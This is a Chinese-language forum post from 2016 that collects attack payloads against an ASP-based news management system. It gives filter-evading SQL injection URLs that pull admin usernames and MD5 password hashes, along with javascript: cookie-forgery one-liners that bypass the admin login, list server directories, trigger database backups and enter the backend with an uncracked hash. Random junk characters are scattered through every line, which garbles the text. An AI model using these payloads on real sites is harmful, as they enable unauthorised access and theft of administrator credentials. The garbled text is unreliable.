一、注入/ v5 t' [, Z5 W- V, `5 p
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=20 H% n0 d0 c3 C
# D; I8 X# b% Q
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
2 R: n5 H# T; z: e0 ]第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
0 b) x5 \ F$ o5 Y3 W- n: ]" d" K可得到用户名和MD5加密码的密码。5 w7 R$ l4 z! `# Y
" L. V: I$ A4 A
二、cookies欺骗8 n, [# V9 H: ^' _: @! V- E' l7 J
* \+ t; o$ [2 T; c, Z& p& ^/ O/ A1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
4 t3 f. U) O1 x5 z2 ?javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
6 }8 k3 z6 E$ V! z' t
6 o2 C `7 @5 \4 D2 B% | }2 v2、列目录.
2 C l, w% m* Q _1 ?+ v' yjavascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."! {8 C1 _% h. Z# A" M. q
( |2 P! M- v! w& j" v& }9 A) M& F
3、数据库备份(适用性好像比较低.)
6 N* G8 b C4 \# r3 y) ujavascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"+ Y9 I! E ?9 }5 V( \" C: q* k& v
3 X7 b2 D1 G! r, {: m7 A
4、得到MD5密码解不了密进后台方法
3 y6 T3 P0 O/ z, _! L4 ojavascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"! V3 h4 f5 _0 ^3 O' E }' C- f" {6 d. Q
|
发表于 2016-5-11 14:55:08
收藏
支持
反对